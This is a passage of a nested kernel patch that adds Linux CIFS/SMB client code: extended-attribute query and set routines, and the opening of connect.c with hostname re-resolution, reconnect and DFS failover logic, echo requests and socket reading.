++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_INFO_QUERY_ALL_EAS);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QueryAllEAs = %d\n", rc);
++		goto QAllEAsOut;
++	}
++
++
++	/* BB also check enough total bytes returned */
++	/* BB we need to improve the validity checking
++	of these trans2 responses */
++
++	rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++	if (rc || get_bcc(&pSMBr->hdr) < 4) {
++		rc = -EIO;	/* bad smb */
++		goto QAllEAsOut;
++	}
++
++	/* check that length of list is not more than bcc */
++	/* check that each entry does not go beyond length
++	   of list */
++	/* check that each element of each entry does not
++	   go beyond end of list */
++	/* validate_trans2_offsets() */
++	/* BB check if start of smb + data_offset > &bcc+ bcc */
++
++	data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++	ea_response_data = (struct fealist *)
++				(((char *) &pSMBr->hdr.Protocol) + data_offset);
++
++	list_len = le32_to_cpu(ea_response_data->list_len);
++	cifs_dbg(FYI, "ea length %d\n", list_len);
++	if (list_len <= 8) {
++		cifs_dbg(FYI, "empty EA list returned from server\n");
++		/* didn't find the named attribute */
++		if (ea_name)
++			rc = -ENODATA;
++		goto QAllEAsOut;
++	}
++
++	/* make sure list_len doesn't go past end of SMB */
++	end_of_smb = (char *)pByteArea(&pSMBr->hdr) + get_bcc(&pSMBr->hdr);
++	if ((char *)ea_response_data + list_len > end_of_smb) {
++		cifs_dbg(FYI, "EA list appears to go beyond SMB\n");
++		rc = -EIO;
++		goto QAllEAsOut;
++	}
++
++	/* account for ea list len */
++	list_len -= 4;
++	temp_fea = ea_response_data->list;
++	temp_ptr = (char *)temp_fea;
++	while (list_len > 0) {
++		unsigned int name_len;
++		__u16 value_len;
++
++		list_len -= 4;
++		temp_ptr += 4;
++		/* make sure we can read name_len and value_len */
++		if (list_len < 0) {
++			cifs_dbg(FYI, "EA entry goes beyond length of list\n");
++			rc = -EIO;
++			goto QAllEAsOut;
++		}
++
++		name_len = temp_fea->name_len;
++		value_len = le16_to_cpu(temp_fea->value_len);
++		list_len -= name_len + 1 + value_len;
++		if (list_len < 0) {
++			cifs_dbg(FYI, "EA entry goes beyond length of list\n");
++			rc = -EIO;
++			goto QAllEAsOut;
++		}
++
++		if (ea_name) {
++			if (ea_name_len == name_len &&
++			    memcmp(ea_name, temp_ptr, name_len) == 0) {
++				temp_ptr += name_len + 1;
++				rc = value_len;
++				if (buf_size == 0)
++					goto QAllEAsOut;
++				if ((size_t)value_len > buf_size) {
++					rc = -ERANGE;
++					goto QAllEAsOut;
++				}
++				memcpy(EAData, temp_ptr, value_len);
++				goto QAllEAsOut;
++			}
++		} else {
++			/* account for prefix user. and trailing null */
++			rc += (5 + 1 + name_len);
++			if (rc < (int) buf_size) {
++				memcpy(EAData, "user.", 5);
++				EAData += 5;
++				memcpy(EAData, temp_ptr, name_len);
++				EAData += name_len;
++				/* null terminate name */
++				*EAData = 0;
++				++EAData;
++			} else if (buf_size == 0) {
++				/* skip copy - calc size only */
++			} else {
++				/* stop before overrun buffer */
++				rc = -ERANGE;
++				break;
++			}
++		}
++		temp_ptr += name_len + 1 + value_len;
++		temp_fea = (struct fea *)temp_ptr;
++	}
++
++	/* didn't find the named attribute */
++	if (ea_name)
++		rc = -ENODATA;
++
++QAllEAsOut:
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto QAllEAsRetry;
++
++	return (ssize_t)rc;
++}
++
++int
++CIFSSMBSetEA(const unsigned int xid, struct cifs_tcon *tcon,
++	     const char *fileName, const char *ea_name, const void *ea_value,
++	     const __u16 ea_value_len, const struct nls_table *nls_codepage,
++	     struct cifs_sb_info *cifs_sb)
++{
++	struct smb_com_transaction2_spi_req *pSMB = NULL;
++	struct smb_com_transaction2_spi_rsp *pSMBr = NULL;
++	struct fealist *parm_data;
++	int name_len;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, param_offset, byte_count, offset, count;
++	int remap = cifs_remap(cifs_sb);
++
++	cifs_dbg(FYI, "In SetEA\n");
++SetEARetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, fileName,
++				       PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, fileName);
++	}
++
++	params = 6 + name_len;
++
++	/* done calculating parms using name_len of file name,
++	now use name_len to calculate length of ea name
++	we are going to create in the inode xattrs */
++	if (ea_name == NULL)
++		name_len = 0;
++	else
++		name_len = strnlen(ea_name, 255);
++
++	count = sizeof(*parm_data) + ea_value_len + name_len;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find max SMB PDU from sess */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++	pSMB->InformationLevel =
++		cpu_to_le16(SMB_SET_FILE_EA);
++
++	parm_data = (void *)pSMB + offsetof(struct smb_hdr, Protocol) + offset;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++	pSMB->DataCount = cpu_to_le16(count);
++	parm_data->list_len = cpu_to_le32(count);
++	parm_data->list[0].EA_flags = 0;
++	/* we checked above that name len is less than 255 */
++	parm_data->list[0].name_len = (__u8)name_len;
++	/* EA names are always ASCII */
++	if (ea_name)
++		strncpy(parm_data->list[0].name, ea_name, name_len);
++	parm_data->list[0].name[name_len] = 0;
++	parm_data->list[0].value_len = cpu_to_le16(ea_value_len);
++	/* caller ensures that ea_value_len is less than 64K but
++	we need to ensure that it fits within the smb */
++
++	/*BB add length check to see if it would fit in
++	     negotiated SMB buffer size BB */
++	/* if (ea_value_len > buffer_size - 512 (enough for header)) */
++	if (ea_value_len)
++		memcpy(parm_data->list[0].name+name_len+1,
++		       ea_value, ea_value_len);
++
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc)
++		cifs_dbg(FYI, "SetPathInfo (EA) returned %d\n", rc);
++
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto SetEARetry;
++
++	return rc;
++}
++#endif
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+new file mode 100644
+index 0000000000000..935fe198a4baf
+--- /dev/null
++++ b/fs/smb/client/connect.c
+@@ -0,0 +1,4754 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2011
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++#include <linux/fs.h>
++#include <linux/net.h>
++#include <linux/string.h>
++#include <linux/sched/mm.h>
++#include <linux/sched/signal.h>
++#include <linux/list.h>
++#include <linux/wait.h>
++#include <linux/slab.h>
++#include <linux/pagemap.h>
++#include <linux/ctype.h>
++#include <linux/utsname.h>
++#include <linux/mempool.h>
++#include <linux/delay.h>
++#include <linux/completion.h>
++#include <linux/kthread.h>
++#include <linux/pagevec.h>
++#include <linux/freezer.h>
++#include <linux/namei.h>
++#include <linux/uuid.h>
++#include <linux/uaccess.h>
++#include <asm/processor.h>
++#include <linux/inet.h>
++#include <linux/module.h>
++#include <keys/user-type.h>
++#include <net/ipv6.h>
++#include <linux/parser.h>
++#include <linux/bvec.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_unicode.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "ntlmssp.h"
++#include "nterr.h"
++#include "rfc1002pdu.h"
++#include "fscache.h"
++#include "smb2proto.h"
++#include "smbdirect.h"
++#include "dns_resolve.h"
++#ifdef CONFIG_CIFS_DFS_UPCALL
++#include "dfs_cache.h"
++#endif
++#include "fs_context.h"
++#include "cifs_swn.h"
++
++extern mempool_t *cifs_req_poolp;
++extern bool disable_legacy_dialects;
++
++/* FIXME: should these be tunable? */
++#define TLINK_ERROR_EXPIRE	(1 * HZ)
++#define TLINK_IDLE_EXPIRE	(600 * HZ)
++
++/* Drop the connection to not overload the server */
++#define NUM_STATUS_IO_TIMEOUT   5
++
++struct mount_ctx {
++	struct cifs_sb_info *cifs_sb;
++	struct smb3_fs_context *fs_ctx;
++	unsigned int xid;
++	struct TCP_Server_Info *server;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	struct cifs_ses *root_ses;
++	uuid_t mount_id;
++	char *origin_fullpath, *leaf_fullpath;
++#endif
++};
++
++static int ip_connect(struct TCP_Server_Info *server);
++static int generic_ip_connect(struct TCP_Server_Info *server);
++static void tlink_rb_insert(struct rb_root *root, struct tcon_link *new_tlink);
++static void cifs_prune_tlinks(struct work_struct *work);
++
++/*
++ * Resolve hostname and set ip addr in tcp ses. Useful for hostnames that may
++ * get their ip addresses changed at some point.
++ *
++ * This should be called with server->srv_mutex held.
++ */
++static int reconn_set_ipaddr_from_hostname(struct TCP_Server_Info *server)
++{
++	int rc;
++	int len;
++	char *unc, *ipaddr = NULL;
++	time64_t expiry, now;
++	unsigned long ttl = SMB_DNS_RESOLVE_INTERVAL_DEFAULT;
++
++	if (!server->hostname)
++		return -EINVAL;
++
++	/* if server hostname isn't populated, there's nothing to do here */
++	if (server->hostname[0] == '\0')
++		return 0;
++
++	len = strlen(server->hostname) + 3;
++
++	unc = kmalloc(len, GFP_KERNEL);
++	if (!unc) {
++		cifs_dbg(FYI, "%s: failed to create UNC path\n", __func__);
++		return -ENOMEM;
++	}
++	scnprintf(unc, len, "\\\\%s", server->hostname);
++
++	rc = dns_resolve_server_name_to_ip(unc, &ipaddr, &expiry);
++	kfree(unc);
++
++	if (rc < 0) {
++		cifs_dbg(FYI, "%s: failed to resolve server part of %s to IP: %d\n",
++			 __func__, server->hostname, rc);
++		goto requeue_resolve;
++	}
++
++	spin_lock(&server->srv_lock);
++	rc = cifs_convert_address((struct sockaddr *)&server->dstaddr, ipaddr,
++				  strlen(ipaddr));
++	spin_unlock(&server->srv_lock);
++	kfree(ipaddr);
++
++	/* rc == 1 means success here */
++	if (rc) {
++		now = ktime_get_real_seconds();
++		if (expiry && expiry > now)
++			/*
++			 * To make sure we don't use the cached entry, retry 1s
++			 * after expiry.
++			 */
++			ttl = max_t(unsigned long, expiry - now, SMB_DNS_RESOLVE_INTERVAL_MIN) + 1;
++	}
++	rc = !rc ? -1 : 0;
++
++requeue_resolve:
++	cifs_dbg(FYI, "%s: next dns resolution scheduled for %lu seconds in the future\n",
++		 __func__, ttl);
++	mod_delayed_work(cifsiod_wq, &server->resolve, (ttl * HZ));
++
++	return rc;
++}
++
++static void smb2_query_server_interfaces(struct work_struct *work)
++{
++	int rc;
++	struct cifs_tcon *tcon = container_of(work,
++					struct cifs_tcon,
++					query_interfaces.work);
++
++	/*
++	 * query server network interfaces, in case they change
++	 */
++	rc = SMB3_request_interfaces(0, tcon, false);
++	if (rc) {
++		cifs_dbg(FYI, "%s: failed to query server interfaces: %d\n",
++				__func__, rc);
++	}
++
++	queue_delayed_work(cifsiod_wq, &tcon->query_interfaces,
++			   (SMB_INTERFACE_POLL_INTERVAL * HZ));
++}
++
++static void cifs_resolve_server(struct work_struct *work)
++{
++	int rc;
++	struct TCP_Server_Info *server = container_of(work,
++					struct TCP_Server_Info, resolve.work);
++
++	cifs_server_lock(server);
++
++	/*
++	 * Resolve the hostname again to make sure that IP address is up-to-date.
++	 */
++	rc = reconn_set_ipaddr_from_hostname(server);
++	if (rc) {
++		cifs_dbg(FYI, "%s: failed to resolve hostname: %d\n",
++				__func__, rc);
++	}
++
++	cifs_server_unlock(server);
++}
++
++/*
++ * Update the tcpStatus for the server.
++ * This is used to signal the cifsd thread to call cifs_reconnect
++ * ONLY cifsd thread should call cifs_reconnect. For any other
++ * thread, use this function
++ *
++ * @server: the tcp ses for which reconnect is needed
++ * @all_channels: if this needs to be done for all channels
++ */
++void
++cifs_signal_cifsd_for_reconnect(struct TCP_Server_Info *server,
++				bool all_channels)
++{
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses;
++	int i;
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	spin_lock(&pserver->srv_lock);
++	if (!all_channels) {
++		pserver->tcpStatus = CifsNeedReconnect;
++		spin_unlock(&pserver->srv_lock);
++		return;
++	}
++	spin_unlock(&pserver->srv_lock);
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		spin_lock(&ses->chan_lock);
++		for (i = 0; i < ses->chan_count; i++) {
++			spin_lock(&ses->chans[i].server->srv_lock);
++			ses->chans[i].server->tcpStatus = CifsNeedReconnect;
++			spin_unlock(&ses->chans[i].server->srv_lock);
++		}
++		spin_unlock(&ses->chan_lock);
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++}
++
++/*
++ * Mark all sessions and tcons for reconnect.
++ * IMPORTANT: make sure that this gets called only from
++ * cifsd thread. For any other thread, use
++ * cifs_signal_cifsd_for_reconnect
++ *
++ * @server: the tcp ses for which reconnect is needed
++ * @server needs to be previously set to CifsNeedReconnect.
++ * @mark_smb_session: whether even sessions need to be marked
++ */
++void
++cifs_mark_tcp_ses_conns_for_reconnect(struct TCP_Server_Info *server,
++				      bool mark_smb_session)
++{
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses, *nses;
++	struct cifs_tcon *tcon;
++
++	/*
++	 * before reconnecting the tcp session, mark the smb session (uid) and the tid bad so they
++	 * are not used until reconnected.
++	 */
++	cifs_dbg(FYI, "%s: marking necessary sessions and tcons for reconnect\n", __func__);
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry_safe(ses, nses, &pserver->smb_ses_list, smb_ses_list) {
++		/* check if iface is still active */
++		if (!cifs_chan_is_iface_active(ses, server))
++			cifs_chan_update_iface(ses, server);
++
++		spin_lock(&ses->chan_lock);
++		if (!mark_smb_session && cifs_chan_needs_reconnect(ses, server)) {
++			spin_unlock(&ses->chan_lock);
++			continue;
++		}
++
++		if (mark_smb_session)
++			CIFS_SET_ALL_CHANS_NEED_RECONNECT(ses);
++		else
++			cifs_chan_set_need_reconnect(ses, server);
++
++		cifs_dbg(FYI, "%s: channel connect bitmap: 0x%lx\n",
++			 __func__, ses->chans_need_reconnect);
++
++		/* If all channels need reconnect, then tcon needs reconnect */
++		if (!mark_smb_session && !CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
++			spin_unlock(&ses->chan_lock);
++			continue;
++		}
++		spin_unlock(&ses->chan_lock);
++
++		spin_lock(&ses->ses_lock);
++		ses->ses_status = SES_NEED_RECON;
++		spin_unlock(&ses->ses_lock);
++
++		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++			tcon->need_reconnect = true;
++			spin_lock(&tcon->tc_lock);
++			tcon->status = TID_NEED_RECON;
++			spin_unlock(&tcon->tc_lock);
++		}
++		if (ses->tcon_ipc) {
++			ses->tcon_ipc->need_reconnect = true;
++			spin_lock(&ses->tcon_ipc->tc_lock);
++			ses->tcon_ipc->status = TID_NEED_RECON;
++			spin_unlock(&ses->tcon_ipc->tc_lock);
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++}
++
++static void
++cifs_abort_connection(struct TCP_Server_Info *server)
++{
++	struct mid_q_entry *mid, *nmid;
++	struct list_head retry_list;
++
++	server->maxBuf = 0;
++	server->max_read = 0;
++
++	/* do not want to be sending data on a socket we are freeing */
++	cifs_dbg(FYI, "%s: tearing down socket\n", __func__);
++	cifs_server_lock(server);
++	if (server->ssocket) {
++		cifs_dbg(FYI, "State: 0x%x Flags: 0x%lx\n", server->ssocket->state,
++			 server->ssocket->flags);
++		kernel_sock_shutdown(server->ssocket, SHUT_WR);
++		cifs_dbg(FYI, "Post shutdown state: 0x%x Flags: 0x%lx\n", server->ssocket->state,
++			 server->ssocket->flags);
++		sock_release(server->ssocket);
++		server->ssocket = NULL;
++	}
++	server->sequence_number = 0;
++	server->session_estab = false;
++	kfree_sensitive(server->session_key.response);
++	server->session_key.response = NULL;
++	server->session_key.len = 0;
++	server->lstrp = jiffies;
++
++	/* mark submitted MIDs for retry and issue callback */
++	INIT_LIST_HEAD(&retry_list);
++	cifs_dbg(FYI, "%s: moving mids to private list\n", __func__);
++	spin_lock(&server->mid_lock);
++	list_for_each_entry_safe(mid, nmid, &server->pending_mid_q, qhead) {
++		kref_get(&mid->refcount);
++		if (mid->mid_state == MID_REQUEST_SUBMITTED)
++			mid->mid_state = MID_RETRY_NEEDED;
++		list_move(&mid->qhead, &retry_list);
++		mid->mid_flags |= MID_DELETED;
++	}
++	spin_unlock(&server->mid_lock);
++	cifs_server_unlock(server);
++
++	cifs_dbg(FYI, "%s: issuing mid callbacks\n", __func__);
++	list_for_each_entry_safe(mid, nmid, &retry_list, qhead) {
++		list_del_init(&mid->qhead);
++		mid->callback(mid);
++		release_mid(mid);
++	}
++
++	if (cifs_rdma_enabled(server)) {
++		cifs_server_lock(server);
++		smbd_destroy(server);
++		cifs_server_unlock(server);
++	}
++}
++
++static bool cifs_tcp_ses_needs_reconnect(struct TCP_Server_Info *server, int num_targets)
++{
++	spin_lock(&server->srv_lock);
++	server->nr_targets = num_targets;
++	if (server->tcpStatus == CifsExiting) {
++		/* the demux thread will exit normally next time through the loop */
++		spin_unlock(&server->srv_lock);
++		wake_up(&server->response_q);
++		return false;
++	}
++
++	cifs_dbg(FYI, "Mark tcp session as need reconnect\n");
++	trace_smb3_reconnect(server->CurrentMid, server->conn_id,
++			     server->hostname);
++	server->tcpStatus = CifsNeedReconnect;
++
++	spin_unlock(&server->srv_lock);
++	return true;
++}
++
++/*
++ * cifs tcp session reconnection
++ *
++ * mark tcp session as reconnecting so temporarily locked
++ * mark all smb sessions as reconnecting for tcp session
++ * reconnect tcp session
++ * wake up waiters on reconnection? - (not needed currently)
++ *
++ * if mark_smb_session is passed as true, unconditionally mark
++ * the smb session (and tcon) for reconnect as well. This value
++ * doesn't really matter for non-multichannel scenario.
++ *
++ */
++static int __cifs_reconnect(struct TCP_Server_Info *server,
++			    bool mark_smb_session)
++{
++	int rc = 0;
++
++	if (!cifs_tcp_ses_needs_reconnect(server, 1))
++		return 0;
++
++	cifs_mark_tcp_ses_conns_for_reconnect(server, mark_smb_session);
++
++	cifs_abort_connection(server);
++
++	do {
++		try_to_freeze();
++		cifs_server_lock(server);
++
++		if (!cifs_swn_set_server_dstaddr(server)) {
++			/* resolve the hostname again to make sure that IP address is up-to-date */
++			rc = reconn_set_ipaddr_from_hostname(server);
++			cifs_dbg(FYI, "%s: reconn_set_ipaddr_from_hostname: rc=%d\n", __func__, rc);
++		}
++
++		if (cifs_rdma_enabled(server))
++			rc = smbd_reconnect(server);
++		else
++			rc = generic_ip_connect(server);
++		if (rc) {
++			cifs_server_unlock(server);
++			cifs_dbg(FYI, "%s: reconnect error %d\n", __func__, rc);
++			msleep(3000);
++		} else {
++			atomic_inc(&tcpSesReconnectCount);
++			set_credits(server, 1);
++			spin_lock(&server->srv_lock);
++			if (server->tcpStatus != CifsExiting)
++				server->tcpStatus = CifsNeedNegotiate;
++			spin_unlock(&server->srv_lock);
++			cifs_swn_reset_server_dstaddr(server);
++			cifs_server_unlock(server);
++			mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
++		}
++	} while (server->tcpStatus == CifsNeedReconnect);
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedNegotiate)
++		mod_delayed_work(cifsiod_wq, &server->echo, 0);
++	spin_unlock(&server->srv_lock);
++
++	wake_up(&server->response_q);
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++static int __reconnect_target_unlocked(struct TCP_Server_Info *server, const char *target)
++{
++	int rc;
++	char *hostname;
++
++	if (!cifs_swn_set_server_dstaddr(server)) {
++		if (server->hostname != target) {
++			hostname = extract_hostname(target);
++			if (!IS_ERR(hostname)) {
++				spin_lock(&server->srv_lock);
++				kfree(server->hostname);
++				server->hostname = hostname;
++				spin_unlock(&server->srv_lock);
++			} else {
++				cifs_dbg(FYI, "%s: couldn't extract hostname or address from dfs target: %ld\n",
++					 __func__, PTR_ERR(hostname));
++				cifs_dbg(FYI, "%s: default to last target server: %s\n", __func__,
++					 server->hostname);
++			}
++		}
++		/* resolve the hostname again to make sure that IP address is up-to-date. */
++		rc = reconn_set_ipaddr_from_hostname(server);
++		cifs_dbg(FYI, "%s: reconn_set_ipaddr_from_hostname: rc=%d\n", __func__, rc);
++	}
++	/* Reconnect the socket */
++	if (cifs_rdma_enabled(server))
++		rc = smbd_reconnect(server);
++	else
++		rc = generic_ip_connect(server);
++
++	return rc;
++}
++
++static int reconnect_target_unlocked(struct TCP_Server_Info *server, struct dfs_cache_tgt_list *tl,
++				     struct dfs_cache_tgt_iterator **target_hint)
++{
++	int rc;
++	struct dfs_cache_tgt_iterator *tit;
++
++	*target_hint = NULL;
++
++	/* If dfs target list is empty, then reconnect to last server */
++	tit = dfs_cache_get_tgt_iterator(tl);
++	if (!tit)
++		return __reconnect_target_unlocked(server, server->hostname);
++
++	/* Otherwise, try every dfs target in @tl */
++	for (; tit; tit = dfs_cache_get_next_tgt(tl, tit)) {
++		rc = __reconnect_target_unlocked(server, dfs_cache_get_tgt_name(tit));
++		if (!rc) {
++			*target_hint = tit;
++			break;
++		}
++	}
++	return rc;
++}
++
++static int reconnect_dfs_server(struct TCP_Server_Info *server)
++{
++	int rc = 0;
++	const char *refpath = server->current_fullpath + 1;
++	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
++	struct dfs_cache_tgt_iterator *target_hint = NULL;
++	int num_targets = 0;
++
++	/*
++	 * Determine the number of dfs targets the referral path in @cifs_sb resolves to.
++	 *
++	 * smb2_reconnect() needs to know how long it should wait based upon the number of dfs
++	 * targets (server->nr_targets).  It's also possible that the cached referral was cleared
++	 * through /proc/fs/cifs/dfscache or the target list is empty due to server settings after
++	 * refreshing the referral, so, in this case, default it to 1.
++	 */
++	if (!dfs_cache_noreq_find(refpath, NULL, &tl))
++		num_targets = dfs_cache_get_nr_tgts(&tl);
++	if (!num_targets)
++		num_targets = 1;
++
++	if (!cifs_tcp_ses_needs_reconnect(server, num_targets))
++		return 0;
++
++	/*
++	 * Unconditionally mark all sessions & tcons for reconnect as we might be connecting to a
++	 * different server or share during failover.  It could be improved by adding some logic to
++	 * only do that in case it connects to a different server or share, though.
++	 */
++	cifs_mark_tcp_ses_conns_for_reconnect(server, true);
++
++	cifs_abort_connection(server);
++
++	do {
++		try_to_freeze();
++		cifs_server_lock(server);
++
++		rc = reconnect_target_unlocked(server, &tl, &target_hint);
++		if (rc) {
++			/* Failed to reconnect socket */
++			cifs_server_unlock(server);
++			cifs_dbg(FYI, "%s: reconnect error %d\n", __func__, rc);
++			msleep(3000);
++			continue;
++		}
++		/*
++		 * Socket was created.  Update tcp session status to CifsNeedNegotiate so that a
++		 * process waiting for reconnect will know it needs to re-establish session and tcon
++		 * through the reconnected target server.
++		 */
++		atomic_inc(&tcpSesReconnectCount);
++		set_credits(server, 1);
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus != CifsExiting)
++			server->tcpStatus = CifsNeedNegotiate;
++		spin_unlock(&server->srv_lock);
++		cifs_swn_reset_server_dstaddr(server);
++		cifs_server_unlock(server);
++		mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
++	} while (server->tcpStatus == CifsNeedReconnect);
++
++	if (target_hint)
++		dfs_cache_noreq_update_tgthint(refpath, target_hint);
++
++	dfs_cache_free_tgts(&tl);
++
++	/* Need to set up echo worker again once connection has been established */
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedNegotiate)
++		mod_delayed_work(cifsiod_wq, &server->echo, 0);
++	spin_unlock(&server->srv_lock);
++
++	wake_up(&server->response_q);
++	return rc;
++}
++
++int cifs_reconnect(struct TCP_Server_Info *server, bool mark_smb_session)
++{
++	/* If tcp session is not an dfs connection, then reconnect to last target server */
++	spin_lock(&server->srv_lock);
++	if (!server->is_dfs_conn) {
++		spin_unlock(&server->srv_lock);
++		return __cifs_reconnect(server, mark_smb_session);
++	}
++	spin_unlock(&server->srv_lock);
++
++	mutex_lock(&server->refpath_lock);
++	if (!server->origin_fullpath || !server->leaf_fullpath) {
++		mutex_unlock(&server->refpath_lock);
++		return __cifs_reconnect(server, mark_smb_session);
++	}
++	mutex_unlock(&server->refpath_lock);
++
++	return reconnect_dfs_server(server);
++}
++#else
++int cifs_reconnect(struct TCP_Server_Info *server, bool mark_smb_session)
++{
++	return __cifs_reconnect(server, mark_smb_session);
++}
++#endif
++
++static void
++cifs_echo_request(struct work_struct *work)
++{
++	int rc;
++	struct TCP_Server_Info *server = container_of(work,
++					struct TCP_Server_Info, echo.work);
++
++	/*
++	 * We cannot send an echo if it is disabled.
++	 * Also, no need to ping if we got a response recently.
++	 */
++
++	if (server->tcpStatus == CifsNeedReconnect ||
++	    server->tcpStatus == CifsExiting ||
++	    server->tcpStatus == CifsNew ||
++	    (server->ops->can_echo && !server->ops->can_echo(server)) ||
++	    time_before(jiffies, server->lstrp + server->echo_interval - HZ))
++		goto requeue_echo;
++
++	rc = server->ops->echo ? server->ops->echo(server) : -ENOSYS;
++	cifs_server_dbg(FYI, "send echo request: rc = %d\n", rc);
++
++	/* Check witness registrations */
++	cifs_swn_check();
++
++requeue_echo:
++	queue_delayed_work(cifsiod_wq, &server->echo, server->echo_interval);
++}
++
++static bool
++allocate_buffers(struct TCP_Server_Info *server)
++{
++	if (!server->bigbuf) {
++		server->bigbuf = (char *)cifs_buf_get();
++		if (!server->bigbuf) {
++			cifs_server_dbg(VFS, "No memory for large SMB response\n");
++			msleep(3000);
++			/* retry will check if exiting */
++			return false;
++		}
++	} else if (server->large_buf) {
++		/* we are reusing a dirty large buf, clear its start */
++		memset(server->bigbuf, 0, HEADER_SIZE(server));
++	}
++
++	if (!server->smallbuf) {
++		server->smallbuf = (char *)cifs_small_buf_get();
++		if (!server->smallbuf) {
++			cifs_server_dbg(VFS, "No memory for SMB response\n");
++			msleep(1000);
++			/* retry will check if exiting */
++			return false;
++		}
++		/* beginning of smb buffer is cleared in our buf_get */
++	} else {
++		/* if existing small buf clear beginning */
++		memset(server->smallbuf, 0, HEADER_SIZE(server));
++	}
++
++	return true;
++}
++
++static bool
++server_unresponsive(struct TCP_Server_Info *server)
++{
++	/*
++	 * We need to wait 3 echo intervals to make sure we handle such
++	 * situations right:
++	 * 1s  client sends a normal SMB request
++	 * 2s  client gets a response
++	 * 30s echo workqueue job pops, and decides we got a response recently
++	 *     and don't need to send another
++	 * ...
++	 * 65s kernel_recvmsg times out, and we see that we haven't gotten
++	 *     a response in >60s.
++	 */
++	spin_lock(&server->srv_lock);
++	if ((server->tcpStatus == CifsGood ||
++	    server->tcpStatus == CifsNeedNegotiate) &&
++	    (!server->ops->can_echo || server->ops->can_echo(server)) &&
++	    time_after(jiffies, server->lstrp + 3 * server->echo_interval)) {
++		spin_unlock(&server->srv_lock);
++		cifs_server_dbg(VFS, "has not responded in %lu seconds. Reconnecting...\n",
++			 (3 * server->echo_interval) / HZ);
++		cifs_reconnect(server, false);
++		return true;
++	}
++	spin_unlock(&server->srv_lock);
++
++	return false;
++}
++
++static inline bool
++zero_credits(struct TCP_Server_Info *server)
++{
++	int val;
++
++	spin_lock(&server->req_lock);
++	val = server->credits + server->echo_credits + server->oplock_credits;
++	if (server->in_flight == 0 && val == 0) {
++		spin_unlock(&server->req_lock);
++		return true;
++	}
++	spin_unlock(&server->req_lock);
++	return false;
++}
++
++static int
++cifs_readv_from_socket(struct TCP_Server_Info *server, struct msghdr *smb_msg)
++{
++	int length = 0;
++	int total_read;
++
++	for (total_read = 0; msg_data_left(smb_msg); total_read += length) {
++		try_to_freeze();
++
++		/* reconnect if no credits and no requests in flight */
++		if (zero_credits(server)) {
++			cifs_reconnect(server, false);
++			return -ECONNABORTED;
++		}
++
++		if (server_unresponsive(server))
++			return -ECONNABORTED;
